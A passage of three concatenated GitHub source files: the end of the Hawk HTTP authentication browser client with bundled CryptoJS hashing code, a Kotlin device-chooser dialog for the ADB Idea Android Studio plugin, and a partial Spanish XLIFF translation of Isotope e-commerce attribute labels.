+ type + '\n' + options.ts + '\n' + options.nonce + '\n' + (options.method || '').toUpperCase() + '\n' + (options.resource || '') + '\n' + options.host.toLowerCase() + '\n' + options.port + '\n' + (options.hash || '') + '\n'; if (options.ext) { normalized += options.ext.replace('\\', '\\\\').replace('\n', '\\n'); } normalized += '\n'; if (options.app) { normalized += options.app + '\n' + (options.dlg || '') + '\n'; } return normalized; }, calculatePayloadHash: function (payload, algorithm, contentType) { var hash = CryptoJS.algo[algorithm.toUpperCase()].create(); hash.update('hawk.' + hawk.crypto.headerVersion + '.payload\n'); hash.update(hawk.utils.parseContentType(contentType) + '\n'); hash.update(payload); hash.update('\n'); return hash.finalize().toString(CryptoJS.enc.Base64); }, calculateTsMac: function (ts, credentials) { var hash = CryptoJS['Hmac' + credentials.algorithm.toUpperCase()]('hawk.' + hawk.crypto.headerVersion + '.ts\n' + ts + '\n', credentials.key); return hash.toString(CryptoJS.enc.Base64); } }; // localStorage compatible interface hawk.internals.LocalStorage = function () { this._cache = {}; this.length = 0; this.getItem = function (key) { return this._cache.hasOwnProperty(key) ? 
String(this._cache[key]) : null; }; this.setItem = function (key, value) { this._cache[key] = String(value); this.length = Object.keys(this._cache).length; }; this.removeItem = function (key) { delete this._cache[key]; this.length = Object.keys(this._cache).length; }; this.clear = function () { this._cache = {}; this.length = 0; }; this.key = function (i) { return Object.keys(this._cache)[i || 0]; }; }; hawk.utils = { storage: new hawk.internals.LocalStorage(), setStorage: function (storage) { var ntpOffset = hawk.utils.storage.getItem('hawk_ntp_offset'); hawk.utils.storage = storage; if (ntpOffset) { hawk.utils.setNtpOffset(ntpOffset); } }, setNtpOffset: function (offset) { try { hawk.utils.storage.setItem('hawk_ntp_offset', offset); } catch (err) { console.error('[hawk] could not write to storage.'); console.error(err); } }, getNtpOffset: function () { var offset = hawk.utils.storage.getItem('hawk_ntp_offset'); if (!offset) { return 0; } return parseInt(offset, 10); }, now: function (localtimeOffsetMsec) { return Math.floor(((new Date()).getTime() + (localtimeOffsetMsec || 0)) / 1000) + hawk.utils.getNtpOffset(); }, escapeHeaderAttribute: function (attribute) { return attribute.replace(/\\/g, '\\\\').replace(/\"/g, '\\"'); }, parseContentType: function (header) { if (!header) { return ''; } return header.split(';')[0].replace(/^\s+|\s+$/g, '').toLowerCase(); }, parseAuthorizationHeader: function (header, keys) { if (!header) { return null; } var headerParts = header.match(/^(\w+)(?:\s+(.*))?$/); // Header: scheme[ something] if (!headerParts) { return null; } var scheme = headerParts[1]; if (scheme.toLowerCase() !== 'hawk') { return null; } var attributesString = headerParts[2]; if (!attributesString) { return null; } var attributes = {}; var verify = attributesString.replace(/(\w+)="([^"\\]*)"\s*(?:,\s*|$)/g, function ($0, $1, $2) { // Check valid attribute names if (keys.indexOf($1) === -1) { return; } // Allowed attribute value characters: 
!#$%&'()*+,-./:;<=>?@[]^_`{|}~ and space, a-z, A-Z, 0-9 if ($2.match(/^[ \w\!#\$%&'\(\)\*\+,\-\.\/\:;<\=>\?@\[\]\^`\{\|\}~]+$/) === null) { return; } // Check for duplicates if (attributes.hasOwnProperty($1)) { return; } attributes[$1] = $2; return ''; }); if (verify !== '') { return null; } return attributes; }, randomString: function (size) { var randomSource = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; var len = randomSource.length; var result = []; for (var i = 0; i < size; ++i) { result[i] = randomSource[Math.floor(Math.random() * len)]; } return result.join(''); }, uriRegex: /^([^:]+)\:\/\/(?:[^@]*@)?([^\/:]+)(?:\:(\d+))?([^#]*)(?:#.*)?$/, // scheme://credentials@host:port/resource#fragment parseUri: function (input) { var parts = input.match(hawk.utils.uriRegex); if (!parts) { return { host: '', port: '', resource: '' }; } var scheme = parts[1].toLowerCase(); var uri = { host: parts[2], port: parts[3] || (scheme === 'http' ? '80' : (scheme === 'https' ? '443' : '')), resource: parts[4] }; return uri; }, base64urlEncode: function (value) { var wordArray = CryptoJS.enc.Utf8.parse(value); var encoded = CryptoJS.enc.Base64.stringify(wordArray); return encoded.replace(/\+/g, '-').replace(/\//g, '_').replace(/\=/g, ''); } }; // $lab:coverage:off$ /* eslint-disable */ // Based on: Crypto-JS v3.1.2 // Copyright (c) 2009-2013, Jeff Mott. All rights reserved. 
// http://code.google.com/p/crypto-js/ // http://code.google.com/p/crypto-js/wiki/License var CryptoJS = CryptoJS || function (h, r) { var k = {}, l = k.lib = {}, n = function () { }, f = l.Base = { extend: function (a) { n.prototype = this; var b = new n; a && b.mixIn(a); b.hasOwnProperty("init") || (b.init = function () { b.$super.init.apply(this, arguments) }); b.init.prototype = b; b.$super = this; return b }, create: function () { var a = this.extend(); a.init.apply(a, arguments); return a }, init: function () { }, mixIn: function (a) { for (var b in a) a.hasOwnProperty(b) && (this[b] = a[b]); a.hasOwnProperty("toString") && (this.toString = a.toString) }, clone: function () { return this.init.prototype.extend(this) } }, j = l.WordArray = f.extend({ init: function (a, b) { a = this.words = a || []; this.sigBytes = b != r ? b : 4 * a.length }, toString: function (a) { return (a || s).stringify(this) }, concat: function (a) { var b = this.words, d = a.words, c = this.sigBytes; a = a.sigBytes; this.clamp(); if (c % 4) for (var e = 0; e < a; e++) b[c + e >>> 2] |= (d[e >>> 2] >>> 24 - 8 * (e % 4) & 255) << 24 - 8 * ((c + e) % 4); else if (65535 < d.length) for (e = 0; e < a; e += 4) b[c + e >>> 2] = d[e >>> 2]; else b.push.apply(b, d); this.sigBytes += a; return this }, clamp: function () { var a = this.words, b = this.sigBytes; a[b >>> 2] &= 4294967295 << 32 - 8 * (b % 4); a.length = h.ceil(b / 4) }, clone: function () { var a = f.clone.call(this); a.words = this.words.slice(0); return a }, random: function (a) { for (var b = [], d = 0; d < a; d += 4) b.push(4294967296 * h.random() | 0); return new j.init(b, a) } }), m = k.enc = {}, s = m.Hex = { stringify: function (a) { var b = a.words; a = a.sigBytes; for (var d = [], c = 0; c < a; c++) { var e = b[c >>> 2] >>> 24 - 8 * (c % 4) & 255; d.push((e >>> 4).toString(16)); d.push((e & 15).toString(16)) } return d.join("") }, parse: function (a) { for (var b = a.length, d = [], c = 0; c < b; c += 2) d[c >>> 3] |= 
parseInt(a.substr(c, 2), 16) << 24 - 4 * (c % 8); return new j.init(d, b / 2) } }, p = m.Latin1 = { stringify: function (a) { var b = a.words; a = a.sigBytes; for (var d = [], c = 0; c < a; c++) d.push(String.fromCharCode(b[c >>> 2] >>> 24 - 8 * (c % 4) & 255)); return d.join("") }, parse: function (a) { for (var b = a.length, d = [], c = 0; c < b; c++) d[c >>> 2] |= (a.charCodeAt(c) & 255) << 24 - 8 * (c % 4); return new j.init(d, b) } }, t = m.Utf8 = { stringify: function (a) { try { return decodeURIComponent(escape(p.stringify(a))) } catch (b) { throw Error("Malformed UTF-8 data"); } }, parse: function (a) { return p.parse(unescape(encodeURIComponent(a))) } }, q = l.BufferedBlockAlgorithm = f.extend({ reset: function () { this._data = new j.init; this._nDataBytes = 0 }, _append: function (a) { "string" == typeof a && (a = t.parse(a)); this._data.concat(a); this._nDataBytes += a.sigBytes }, _process: function (a) { var b = this._data, d = b.words, c = b.sigBytes, e = this.blockSize, f = c / (4 * e), f = a ? 
h.ceil(f) : h.max((f | 0) - this._minBufferSize, 0); a = f * e; c = h.min(4 * a, c); if (a) { for (var g = 0; g < a; g += e) this._doProcessBlock(d, g); g = d.splice(0, a); b.sigBytes -= c } return new j.init(g, c) }, clone: function () { var a = f.clone.call(this); a._data = this._data.clone(); return a }, _minBufferSize: 0 }); l.Hasher = q.extend({ cfg: f.extend(), init: function (a) { this.cfg = this.cfg.extend(a); this.reset() }, reset: function () { q.reset.call(this); this._doReset() }, update: function (a) { this._append(a); this._process(); return this }, finalize: function (a) { a && this._append(a); return this._doFinalize() }, blockSize: 16, _createHelper: function (a) { return function (b, d) { return (new a.init(d)).finalize(b) } }, _createHmacHelper: function (a) { return function (b, d) { return (new u.HMAC.init(a, d)).finalize(b) } } }); var u = k.algo = {}; return k }(Math); (function () { var k = CryptoJS, b = k.lib, m = b.WordArray, l = b.Hasher, d = [], b = k.algo.SHA1 = l.extend({ _doReset: function () { this._hash = new m.init([1732584193, 4023233417, 2562383102, 271733878, 3285377520]) }, _doProcessBlock: function (n, p) { for (var a = this._hash.words, e = a[0], f = a[1], h = a[2], j = a[3], b = a[4], c = 0; 80 > c; c++) { if (16 > c) d[c] = n[p + c] | 0; else { var g = d[c - 3] ^ d[c - 8] ^ d[c - 14] ^ d[c - 16]; d[c] = g << 1 | g >>> 31 } g = (e << 5 | e >>> 27) + b + d[c]; g = 20 > c ? g + ((f & h | ~f & j) + 1518500249) : 40 > c ? g + ((f ^ h ^ j) + 1859775393) : 60 > c ? 
g + ((f & h | f & j | h & j) - 1894007588) : g + ((f ^ h ^ j) - 899497514); b = j; j = h; h = f << 30 | f >>> 2; f = e; e = g } a[0] = a[0] + e | 0; a[1] = a[1] + f | 0; a[2] = a[2] + h | 0; a[3] = a[3] + j | 0; a[4] = a[4] + b | 0 }, _doFinalize: function () { var b = this._data, d = b.words, a = 8 * this._nDataBytes, e = 8 * b.sigBytes; d[e >>> 5] |= 128 << 24 - e % 32; d[(e + 64 >>> 9 << 4) + 14] = Math.floor(a / 4294967296); d[(e + 64 >>> 9 << 4) + 15] = a; b.sigBytes = 4 * d.length; this._process(); return this._hash }, clone: function () { var b = l.clone.call(this); b._hash = this._hash.clone(); return b } }); k.SHA1 = l._createHelper(b); k.HmacSHA1 = l._createHmacHelper(b) })(); (function (k) { for (var g = CryptoJS, h = g.lib, v = h.WordArray, j = h.Hasher, h = g.algo, s = [], t = [], u = function (q) { return 4294967296 * (q - (q | 0)) | 0 }, l = 2, b = 0; 64 > b;) { var d; a: { d = l; for (var w = k.sqrt(d), r = 2; r <= w; r++) if (!(d % r)) { d = !1; break a } d = !0 } d && (8 > b && (s[b] = u(k.pow(l, 0.5))), t[b] = u(k.pow(l, 1 / 3)), b++); l++ } var n = [], h = h.SHA256 = j.extend({ _doReset: function () { this._hash = new v.init(s.slice(0)) }, _doProcessBlock: function (q, h) { for (var a = this._hash.words, c = a[0], d = a[1], b = a[2], k = a[3], f = a[4], g = a[5], j = a[6], l = a[7], e = 0; 64 > e; e++) { if (16 > e) n[e] = q[h + e] | 0; else { var m = n[e - 15], p = n[e - 2]; n[e] = ((m << 25 | m >>> 7) ^ (m << 14 | m >>> 18) ^ m >>> 3) + n[e - 7] + ((p << 15 | p >>> 17) ^ (p << 13 | p >>> 19) ^ p >>> 10) + n[e - 16] } m = l + ((f << 26 | f >>> 6) ^ (f << 21 | f >>> 11) ^ (f << 7 | f >>> 25)) + (f & g ^ ~f & j) + t[e] + n[e]; p = ((c << 30 | c >>> 2) ^ (c << 19 | c >>> 13) ^ (c << 10 | c >>> 22)) + (c & d ^ c & b ^ d & b); l = j; j = g; g = f; f = k + m | 0; k = b; b = d; d = c; c = m + p | 0 } a[0] = a[0] + c | 0; a[1] = a[1] + d | 0; a[2] = a[2] + b | 0; a[3] = a[3] + k | 0; a[4] = a[4] + f | 0; a[5] = a[5] + g | 0; a[6] = a[6] + j | 0; a[7] = 
a[7] + l | 0 }, _doFinalize: function () { var d = this._data, b = d.words, a = 8 * this._nDataBytes, c = 8 * d.sigBytes; b[c >>> 5] |= 128 << 24 - c % 32; b[(c + 64 >>> 9 << 4) + 14] = k.floor(a / 4294967296); b[(c + 64 >>> 9 << 4) + 15] = a; d.sigBytes = 4 * b.length; this._process(); return this._hash }, clone: function () { var b = j.clone.call(this); b._hash = this._hash.clone(); return b } }); g.SHA256 = j._createHelper(h); g.HmacSHA256 = j._createHmacHelper(h) })(Math); (function () { var c = CryptoJS, k = c.enc.Utf8; c.algo.HMAC = c.lib.Base.extend({ init: function (a, b) { a = this._hasher = new a.init; "string" == typeof b && (b = k.parse(b)); var c = a.blockSize, e = 4 * c; b.sigBytes > e && (b = a.finalize(b)); b.clamp(); for (var f = this._oKey = b.clone(), g = this._iKey = b.clone(), h = f.words, j = g.words, d = 0; d < c; d++) h[d] ^= 1549556828, j[d] ^= 909522486; f.sigBytes = g.sigBytes = e; this.reset() }, reset: function () { var a = this._hasher; a.reset(); a.update(this._iKey) }, update: function (a) { this._hasher.update(a); return this }, finalize: function (a) { var b = this._hasher; a = b.finalize(a); b.reset(); return b.finalize(this._oKey.clone().concat(a)) } }) })(); (function () { var h = CryptoJS, j = h.lib.WordArray; h.enc.Base64 = { stringify: function (b) { var e = b.words, f = b.sigBytes, c = this._map; b.clamp(); b = []; for (var a = 0; a < f; a += 3) for (var d = (e[a >>> 2] >>> 24 - 8 * (a % 4) & 255) << 16 | (e[a + 1 >>> 2] >>> 24 - 8 * ((a + 1) % 4) & 255) << 8 | e[a + 2 >>> 2] >>> 24 - 8 * ((a + 2) % 4) & 255, g = 0; 4 > g && a + 0.75 * g < f; g++) b.push(c.charAt(d >>> 6 * (3 - g) & 63)); if (e = c.charAt(64)) for (; b.length % 4;) b.push(e); return b.join("") }, parse: function (b) { var e = b.length, f = this._map, c = f.charAt(64); c && (c = b.indexOf(c), -1 != c && (e = c)); for (var c = [], a = 0, d = 0; d < e; d++) if (d % 4) { var g = f.indexOf(b.charAt(d - 1)) << 2 * (d % 4), h = f.indexOf(b.charAt(d)) >>> 6 - 2 * (d 
% 4); c[a >>> 2] |= (g | h) << 24 - 8 * (a % 4); a++ } return j.create(c, a) }, _map: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" } })(); hawk.crypto.internals = CryptoJS; // Export if used as a module if (typeof module !== 'undefined' && module.exports) { module.exports = hawk; } /* eslint-enable */ // $lab:coverage:on$
{ "pile_set_name": "Github" }
package com.developerphil.adbidea.ui import com.android.ddmlib.IDevice import com.developerphil.adbidea.ObjectGraph import com.developerphil.adbidea.preference.ProjectPreferences import com.intellij.openapi.project.Project import com.intellij.openapi.ui.DialogWrapper import com.intellij.openapi.util.Disposer import org.jetbrains.android.facet.AndroidFacet import org.jetbrains.android.util.AndroidBundle import org.joor.Reflect import javax.swing.JCheckBox import javax.swing.JComponent import javax.swing.JPanel /** * https://android.googlesource.com/platform/tools/adt/idea/+/refs/heads/mirror-goog-studio-master-dev/android/src/com/android/tools/idea/run/DeviceChooserDialog.java */ class DeviceChooserDialog(facet: AndroidFacet) : DialogWrapper(facet.module.project, true) { lateinit var myPanel: JPanel lateinit var myDeviceChooserWrapper: JPanel lateinit var useSameDeviceSCheckBox: JCheckBox private val myProject: Project private val myDeviceChooser: MyDeviceChooser private val projectPreferences: ProjectPreferences val selectedDevices: Array<IDevice> get() = myDeviceChooser.selectedDevices init { title = AndroidBundle.message("choose.device.dialog.title") myProject = facet.module.project projectPreferences = myProject.getComponent(ObjectGraph::class.java).projectPreferences okAction.isEnabled = false myDeviceChooser = MyDeviceChooser(true, okAction, facet, null) Disposer.register(myDisposable, myDeviceChooser) myDeviceChooser.addListener(object : DeviceChooserListener { override fun selectedDevicesChanged() { updateOkButton() } }) myDeviceChooserWrapper.add(myDeviceChooser.panel) myDeviceChooser.init(projectPreferences.getSelectedDeviceSerials()) init() updateOkButton() } private fun persistSelectedSerialsToPreferences() { projectPreferences.saveSelectedDeviceSerials(myDeviceChooser.selectedDevices.map { it.serialNumber }.toList()) } private fun updateOkButton() { okAction.isEnabled = selectedDevices.isNotEmpty() } override fun getPreferredFocusedComponent(): 
JComponent? { return try { myDeviceChooser.preferredFocusComponent } catch (e: NoSuchMethodError) { // that means that we are probably on a preview version of android studio or in intellij 13 Reflect.on(myDeviceChooser).call("getDeviceTable").get<JComponent>() } } override fun doOKAction() { myDeviceChooser.finish() persistSelectedSerialsToPreferences() super.doOKAction() } override fun getDimensionServiceKey() = javaClass.canonicalName override fun createCenterPanel(): JComponent = myPanel fun useSameDevices() = useSameDeviceSCheckBox.isSelected }
{ "pile_set_name": "Github" }
<?xml version="1.0" ?><xliff version="1.1" xmlns="urn:oasis:names:tc:xliff:document:1.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:oasis:names:tc:xliff:document:1.2 http://docs.oasis-open.org/xliff/v1.2/cs02/xliff-core-1.2-strict.xsd"> <file datatype="plaintext" original="system/modules/isotope/languages/en/tl_iso_attribute.xlf" source-language="en" target-language="es"> <body> <trans-unit id="tl_iso_attribute.name.0"> <source>Name</source> <target>Nombre</target> </trans-unit> <trans-unit id="tl_iso_attribute.name.1"> <source>Please enter a name for this attribute.</source> <target>Por favor, introduzca un nombre para este atributo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.field_name.0"> <source>Internal name</source> <target>Nombre interno</target> </trans-unit> <trans-unit id="tl_iso_attribute.field_name.1"> <source>Internal name is the database field name and must be unique.</source> <target>El nombre interno es el nombre en la base de datos y debe ser único.</target> </trans-unit> <trans-unit id="tl_iso_attribute.type.0"> <source>Type</source> <target>Tipo</target> </trans-unit> <trans-unit id="tl_iso_attribute.type.1"> <source>Please select a type for this attribute.</source> <target>Por favor seleccione un tipo de impuesto para este atributo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.legend.0"> <source>Field Group</source> <target>Grupo de campo</target> </trans-unit> <trans-unit id="tl_iso_attribute.legend.1"> <source>Select a field group that this attribute relates to (used to organize related fields into collapsible fieldset groups when editing products.</source> <target>Seleccione un grupo de campo al cual se refiere este atributo (utilizado para organizar los campos relacionados en grupos fieldset plegables al editar los productos).</target> </trans-unit> <trans-unit id="tl_iso_attribute.variant_option.0"> <source>Add to product variants wizard</source> <target>Asistente para añadir 
variantes del producto</target> </trans-unit> <trans-unit id="tl_iso_attribute.variant_option.1"> <source>If selected, this attribute will be added to the product variants wizard for use as a product variant option.</source> <target>Si está seleccionada, se añadirá este atributo en el asistente variantes del producto, para su uso como una opción de variante del producto.</target> </trans-unit> <trans-unit id="tl_iso_attribute.customer_defined.0"> <source>Defined by customer</source> <target>Definido por el cliente</target> </trans-unit> <trans-unit id="tl_iso_attribute.customer_defined.1"> <source>Please select if this value defined by the customer (frontend).</source> <target>Por favor, seleccione si este valor esta definido por el cliente (frontend).</target> </trans-unit> <trans-unit id="tl_iso_attribute.description.0"> <source>Description</source> <target>Descripción</target> </trans-unit> <trans-unit id="tl_iso_attribute.description.1"> <source>The description is shown as a hint to the backend user.</source> <target>La descripción se muestra como una sugerencia al usuario backend.</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.0"> <source>Options source</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.1"> <source>Choose where the options for this field should be loaded from.</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.name"> <source>Attribute Name (Single Option)</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.table"> <source>Options Manager</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.product"> <source>Product</source> <target>Producto</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.foreignKey"> <source>Custom database table (foreignKey)</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsSource.attribute"> <source>Options Wizard (deprecated)</source> </trans-unit> <trans-unit id="tl_iso_attribute.options.0"> 
<source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.1"> <source>Please enter one or more options. Use the buttons to add, move or delete an option. If you are working without JavaScript assistance, you should save your changes before you modify the order!</source> <target>Escriba una o varias opciones. Utilice los botones para añadir, mover o eliminar una opción. Si está trabajando sin ayuda de JavaScript debe guardar sus cambios antes de modificar el orden!</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.value.0"> <source>Value</source> <target>Valor</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.label.0"> <source>Label</source> <target>Etiqueta</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.default.0"> <source>Default</source> <target>Por defecto</target> </trans-unit> <trans-unit id="tl_iso_attribute.options.group.0"> <source>Group</source> <target>Groupo</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable.0"> <source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable.1"> <source>Use the options manager to add your options to the field.</source> </trans-unit> <trans-unit id="tl_iso_attribute.includeBlankOption.0"> <source>Include blank option</source> </trans-unit> <trans-unit id="tl_iso_attribute.includeBlankOption.1"> <source>Check here to include a blank option in the select menu.</source> </trans-unit> <trans-unit id="tl_iso_attribute.blankOptionLabel.0"> <source>Label for blank option</source> </trans-unit> <trans-unit id="tl_iso_attribute.blankOptionLabel.1"> <source>You can optionally enter a label for the blank option. 
If you do not enter anything, a dash (-) will be used.</source> </trans-unit> <trans-unit id="tl_iso_attribute.mandatory.0"> <source>Mandatory field</source> <target>Campo obligatorio</target> </trans-unit> <trans-unit id="tl_iso_attribute.mandatory.1"> <source>The field must be filled when editing a product.</source> <target>El campo debe ser rellenado durante la edición de un producto.</target> </trans-unit> <trans-unit id="tl_iso_attribute.multiple.0"> <source>Multiple selection</source> <target>Selección múltiple</target> </trans-unit> <trans-unit id="tl_iso_attribute.multiple.1"> <source>Allow visitors to select more than one option.</source> <target>Permitir a los visitantes que seleccionen más de una opción.</target> </trans-unit> <trans-unit id="tl_iso_attribute.size.0"> <source>Size/Amount</source> </trans-unit> <trans-unit id="tl_iso_attribute.size.1"> <source>Here you can set a limit, e.g. size of the select box or number of file uploads.</source> </trans-unit> <trans-unit id="tl_iso_attribute.chosen.0"> <source>Use &quot;Chosen&quot; JavaScript</source> </trans-unit> <trans-unit id="tl_iso_attribute.chosen.1"> <source>This option enables the usage of the &quot;Chosen&quot; JavaScript for the select field, which enables you to select multiple values via a search function.</source> </trans-unit> <trans-unit id="tl_iso_attribute.extensions.0"> <source>Allowed file types</source> <target>Tipos de archivo permitidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.extensions.1"> <source>A comma separated list of valid file extensions.</source> <target>Una lista separada por comas de extensiones de archivo válidos.</target> </trans-unit> <trans-unit id="tl_iso_attribute.rte.0"> <source>Use HTML editor</source> <target>Utilizar el editor HTML</target> </trans-unit> <trans-unit id="tl_iso_attribute.rte.1"> <source>Select a tinyMCE configuration file to enable the rich text editor.</source> <target>Seleccione un archivo de configuración TinyMCE para 
habilitar el editor de texto enriquecido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.multilingual.0"> <source>Multilingual</source> <target>Multilingüe</target> </trans-unit> <trans-unit id="tl_iso_attribute.multilingual.1"> <source>Check here if this field should be translated.</source> <target>Marque aquí si este campo debe ser traducido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.rgxp.0"> <source>Input validation</source> <target>Validación de entrada</target> </trans-unit> <trans-unit id="tl_iso_attribute.rgxp.1"> <source>Validate the input against a regular expression.</source> <target>Validar la entrada con una expresión regular.</target> </trans-unit> <trans-unit id="tl_iso_attribute.placeholder.0"> <source>Placeholder</source> </trans-unit> <trans-unit id="tl_iso_attribute.placeholder.1"> <source>Show this text as long as the field is empty (requires HTML5).</source> </trans-unit> <trans-unit id="tl_iso_attribute.minlength.0"> <source>Minimum length</source> </trans-unit> <trans-unit id="tl_iso_attribute.minlength.1"> <source>Require the field value to be a certain number of characters (text) or bytes (file uploads).</source> </trans-unit> <trans-unit id="tl_iso_attribute.maxlength.0"> <source>Maximum length</source> <target>Longitud máxima</target> </trans-unit> <trans-unit id="tl_iso_attribute.maxlength.1"> <source>Limit the field length to a certain number of characters (text) or bytes (file uploads).</source> <target>Limitar la longitud de campo a un cierto número de caracteres (texto) o bytes (subida de archivos).</target> </trans-unit> <trans-unit id="tl_iso_attribute.foreignKey.0"> <source>Foreign table &amp; field</source> <target>Tabla y campo exterior</target> </trans-unit> <trans-unit id="tl_iso_attribute.foreignKey.1"> <source>Instead of adding options you can enter a table.field combination to select from database. 
To use multilingual foreignKeys, enter one per line and specify the language (example: en=tl_table.field)</source> <target>En lugar de añadir opciones, puede introducir una combinación tabla.campo para seleccionar en la base de datos. Para utilizar las claves externas multilingües, introduzca una por línea y especifique el idioma (ejemplo: en = tl_table.field)</target> </trans-unit> <trans-unit id="tl_iso_attribute.conditionField.0"> <source>Parent field</source> <target>Campo padre</target> </trans-unit> <trans-unit id="tl_iso_attribute.conditionField.1"> <source>Please select the parent field, which must be of type &quot;Select-Menu&quot;. For parent-child relation to work, define each option of this parent field as group of the conditional select-menu.</source> <target>Por favor, seleccione el campo padre, que debe ser de tipo &quot;Select-Menu&quot;. Para que funcione la relación padre-hijo, definir cada opción de este campo padre como el grupo del Select-Menu condicional.</target> </trans-unit> <trans-unit id="tl_iso_attribute.files.0"> <source>Show files</source> <target>Mostrar archivos</target> </trans-unit> <trans-unit id="tl_iso_attribute.files.1"> <source>Show both files and folders.</source> <target>Mostrar archivos y carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.filesOnly.0"> <source>Files only</source> <target>Archivos sólo</target> </trans-unit> <trans-unit id="tl_iso_attribute.filesOnly.1"> <source>Remove the radio buttons or checkboxes next to folders.</source> <target>Retire los botones de opción o casillas junto a las carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.isGallery.0"> <source>Mark as gallery</source> </trans-unit> <trans-unit id="tl_iso_attribute.isGallery.1"> <source>Mark the attribute as image gallery which allows for better display in the backend.</source> </trans-unit> <trans-unit id="tl_iso_attribute.fieldType.0"> <source>Field type</source> <target>Tipo de campo</target> </trans-unit> 
<trans-unit id="tl_iso_attribute.fieldType.1"> <source>Display radio buttons or checkboxes next to folders.</source> <target>Mostrar botones de opción o casillas junto a las carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.sortBy.0"> <source>Order by</source> <target>Ordenar por</target> </trans-unit> <trans-unit id="tl_iso_attribute.sortBy.1"> <source>Please choose the sort order.</source> <target>Por favor, elija el orden de clasificación.</target> </trans-unit> <trans-unit id="tl_iso_attribute.path.0"> <source>Root directory</source> <target>Directorio raíz</target> </trans-unit> <trans-unit id="tl_iso_attribute.path.1"> <source>You can limit the file tree by defining a root directory here.</source> <target>Puede limitar el árbol de archivos mediante la definición de un directorio raíz aquí.</target> </trans-unit> <trans-unit id="tl_iso_attribute.storeFile.0"> <source>Store uploaded files</source> <target>Guardar los archivos subidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.storeFile.1"> <source>Move the uploaded files to a folder on the server.</source> <target>Mover los archivos subidos a una carpeta en el servidor.</target> </trans-unit> <trans-unit id="tl_iso_attribute.uploadFolder.0"> <source>Target folder</source> <target>Carpeta de destino</target> </trans-unit> <trans-unit id="tl_iso_attribute.uploadFolder.1"> <source>Please select the target folder from the files directory.</source> <target>Por favor, seleccione la carpeta de destino en el directorio de archivos.</target> </trans-unit> <trans-unit id="tl_iso_attribute.useHomeDir.0"> <source>Use home directory</source> <target>Utilice el directorio home</target> </trans-unit> <trans-unit id="tl_iso_attribute.useHomeDir.1"> <source>Store the file in the home directory if there is an authenticated user.</source> <target>Guardar el archivo en el directorio home si hay un usuario autentificado.</target> </trans-unit> <trans-unit id="tl_iso_attribute.doNotOverwrite.0"> 
<source>Preserve existing files</source> <target>Preservar los archivos existentes</target> </trans-unit> <trans-unit id="tl_iso_attribute.doNotOverwrite.1"> <source>Add a numeric suffix to the new file if the file name already exists.</source> <target>Agregar un sufijo numérico para el nuevo archivo si ya existe el nombre del archivo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutRelocate.0"> <source>Move file(s) after checkout</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutRelocate.1"> <source>Re-organize files after an order has been completed.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFolder.0"> <source>Target folder</source> <target>Carpeta de destino</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFolder.1"> <source>Enter the target path relative to Contao root. Use simple tokens and insert tags to generate a dynamic name (see help wizard).</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFile.0"> <source>Target file name</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFile.1"> <source>Enter the target file name. 
Use simple tokens and insert tags to generate a dynamic name (see help wizard).</source> </trans-unit> <trans-unit id="tl_iso_attribute.fe_sorting.0"> <source>Add to &quot;Order By&quot; option list</source> <target>Añadir a la lista de opciones &quot;Ordenar por&quot;</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_sorting.1"> <source>This field will be sortable in the listing module provided the attribute is visible to customers.</source> <target>Este campo se puede ordenar en el módulo de la lista proporcionando el atributo visible para los clientes.</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_filter.0"> <source>Backend filterable</source> <target>Filtrable Backend</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_filter.1"> <source>Can this attribute be used in a backend filter?</source> <target>¿Este atributo puede ser utilizado en un filtro de backend?</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_search.0"> <source>Backend searchable</source> <target>Búsqueda Backend</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_search.1"> <source>Should the field be available in the backend search?</source> </trans-unit> <trans-unit id="tl_iso_attribute.fe_filter.0"> <source>Frontend filterable</source> <target>Filtrable frontend</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_filter.1"> <source>Can this attribute be used in a frontend filter?</source> <target>¿Este atributo puede ser utilizado en un filtro frontend?</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_search.0"> <source>Frontend searchable</source> <target>Búsqueda frontend</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_search.1"> <source>Should the search engine look in this field for search terms?</source> <target>¿Debe el motor de búsqueda buscar en este campo para los términos de búsqueda?</target> </trans-unit> <trans-unit id="tl_iso_attribute.datepicker.0"> <source>Date picker</source> <target>Selector de 
